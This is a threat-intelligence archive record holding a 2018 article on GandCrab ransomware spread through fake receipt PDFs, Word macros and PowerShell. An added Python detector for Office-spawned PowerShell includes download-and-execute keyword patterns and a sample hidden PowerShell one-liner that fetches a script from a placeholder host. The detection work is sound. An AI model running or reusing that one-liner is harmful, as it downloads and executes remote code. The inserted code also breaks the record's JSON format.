{
	"id": "ddaf6679-1e51-4760-a48f-c8bc1955bb0a",
	"created_at": "2026-04-06T00:22:11.193821Z",
	"updated_at": "2026-04-10T03:24:30.194051Z",
	"deleted_at": null,
	"sha1_hash": "480cf50a82da925d0a2578fb395e3f48eddf32e7",
	"title": "GandCrab Ransomware Being Distributed Via Malspam Disguised as Receipts",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1120345,
	"plain_text": "GandCrab Ransomware Being Distributed Via Malspam Disguised as Receipts\r\nBy Lawrence Abrams\r\nPublished: 2018-02-08 · Archived: 2026-04-05 20:30:37 UTC\r\nA new malspam campaign is underway that pretends to deliver PDF receipts but instead installs the GandCrab ransomware on a victim's computer. It does so through a series of malicious documents that ultimately install the ransomware via a PowerShell script.\r\nThe chain of events that leads to the installation of GandCrab starts when a victim receives an email with a subject like \"Receipt Feb-078122\". These emails contain a PDF attachment with a name like Feb01221812.pdf, as shown below.\r\nMalspam Pretending to be a Receipt\r\nWhen a user opens this PDF, they are shown a prompt that pretends to be a captcha asking the user to confirm they are human.\r\nFake Captcha\r\nWhen the user clicks on the captcha, the PDF file downloads a malicious Word document. When opened, this document contains the standard social engineering text that tries to convince the user to enable macros by clicking on the Enable Content button.\r\nMalicious Word Document\r\nOnce the user clicks on the Enable Content button, it triggers the malicious macro shown below.\r\nMalicious Word Macro\r\nThis macro launches a PowerShell command that downloads and executes a PowerShell script from a remote site. As pointed out by security researcher Derek Knight, the macro specifically calls the PowerShell executable from a folder that only exists on 64-bit versions of Windows. Therefore, those who are running 32-bit versions of Windows are protected from this macro.\r\nThe PowerShell command executed by the Word document is seen below.\r\nPowerShell Command\r\nWhen the sct5 PowerShell script is executed, it decodes an embedded GandCrab executable and launches it.\r\nPowerShell Installer\r\nOnce launched, GandCrab connects to its remote Command \u0026 Control servers and begins encrypting the victim's computer.\r\nAs you can see, this all started simply by opening a malicious PDF contained in malspam. This is why it is very important not to open any attachments unless you have confirmed that they were actually sent by the sender. If the sender is not someone you know, then do not open the attachment at all.\r\nFor those who are infected with this ransomware, you can request help in our GandCrab Help \u0026 Support topic.\r\nBe smart and stay safe!\r\nUpdate 2/8/18 10:45 AM: Added information from Derek Knight about how the macro calls the PowerShell command from a folder that only exists on 64-bit versions of Windows.\r\n
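To make the Office-to-PowerShell step of this chain concrete, here is an added example that is not part of the original article: a small Python detector run over constructed process-creation events with Sysmon-style fields (parent image, image, command line). It flags a Word process spawning powershell.exe, adds a reason when the command line carries download-and-execute markers, and adds another when the PowerShell binary sits under SysWOW64. The article does not name the 64-bit-only folder Derek Knight identified, so the SysWOW64 check, the marker list and the sample events (including the placeholder URL) are assumptions of this example, not indicators taken from the campaign.

```python
import ntpath
from dataclasses import dataclass

# Parent images whose child PowerShell is suspicious (macro-launched).
OFFICE_PARENTS = {'winword.exe', 'excel.exe', 'powerpnt.exe'}
POWERSHELL_IMAGES = {'powershell.exe', 'pwsh.exe'}
# Substrings that download-and-execute one-liners commonly carry. The article
# only says the macro downloads and runs a remote script, so these are
# heuristics of this example, not indicators taken from the campaign.
DOWNLOAD_EXEC_MARKERS = ('downloadstring', 'downloadfile', 'net.webclient',
                         'invoke-webrequest', 'invoke-expression', 'frombase64string')


@dataclass
class ProcEvent:
    '''Minimal process-creation record (Sysmon Event ID 1 style fields).'''
    parent_image: str
    image: str
    command_line: str


def image_name(path):
    '''Lower-cased file name of a Windows path, independent of the host OS.'''
    return ntpath.basename(path).lower()


def is_wow64_powershell(image):
    '''True when the PowerShell binary lives under SysWOW64.

    ASSUMPTION: the article does not name the 64-bit-only folder the macro
    targets; SysWOW64 is used here because it exists only on 64-bit Windows.
    '''
    return 'syswow64' in image.lower().split(ntpath.sep)


def classify(event):
    '''Return the reasons an event matches the Office -> PowerShell step, or [].'''
    reasons = []
    if image_name(event.parent_image) not in OFFICE_PARENTS:
        return reasons
    if image_name(event.image) not in POWERSHELL_IMAGES:
        return reasons
    reasons.append('office-spawned-powershell')
    cl = event.command_line.lower()
    hits = [m for m in DOWNLOAD_EXEC_MARKERS if m in cl]
    # IEX is short enough to match inside other words, so check it as a token.
    tokens = cl.replace('(', ' ').replace(')', ' ').replace(';', ' ').split()
    if 'iex' in tokens:
        hits.append('iex')
    if hits:
        reasons.append('download-exec:' + ','.join(hits))
    if is_wow64_powershell(event.image):
        reasons.append('wow64-powershell-path')
    return reasons


def scan(events):
    '''Index and reasons for every event that classify() flags.'''
    flagged = []
    for idx, ev in enumerate(events):
        reasons = classify(ev)
        if reasons:
            flagged.append((idx, reasons))
    return flagged


# Constructed sample events (not captured telemetry). The URL is a placeholder.
SAMPLE_EVENTS = [
    ProcEvent('C:\\Windows\\explorer.exe',
              'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
              'powershell.exe -File C:\\scripts\\backup.ps1'),
    ProcEvent('C:\\Program Files (x86)\\Microsoft Office\\Office16\\WINWORD.EXE',
              'C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe',
              'powershell -w hidden -ep bypass -c IEX (New-Object Net.WebClient)'
              '.DownloadString(\"http://example.invalid/sct5\")'),
    ProcEvent('C:\\Program Files (x86)\\Microsoft Office\\Office16\\WINWORD.EXE',
              'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
              'powershell.exe -Command Get-Date'),
]

if __name__ == '__main__':
    for idx, reasons in scan(SAMPLE_EVENTS):
        print(idx, reasons)
```

Run as a script to print the flagged events. In practice the same logic would be applied to EDR or Sysmon process-creation telemetry; the SysWOW64 condition also catches 32-bit PowerShell launched for legitimate reasons, so treat it as an enrichment on top of the Office-parent match rather than a standalone alert.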
Source: https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/"
	],
	"report_names": [
		"gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d",
			"created_at": "2022-10-25T16:07:24.139848Z",
			"updated_at": "2026-04-10T02:00:04.878798Z",
			"deleted_at": null,
			"main_name": "Safe",
			"aliases": [],
			"source_name": "ETDA:Safe",
			"tools": [
				"DebugView",
				"LZ77",
				"OpenDoc",
				"SafeDisk",
				"TypeConfig",
				"UPXShell",
				"UsbDoc",
				"UsbExe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434931,
	"ts_updated_at": 1775791470,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/480cf50a82da925d0a2578fb395e3f48eddf32e7.pdf",
		"text": "https://archive.orkl.eu/480cf50a82da925d0a2578fb395e3f48eddf32e7.txt",
		"img": "https://archive.orkl.eu/480cf50a82da925d0a2578fb395e3f48eddf32e7.jpg"
	}
}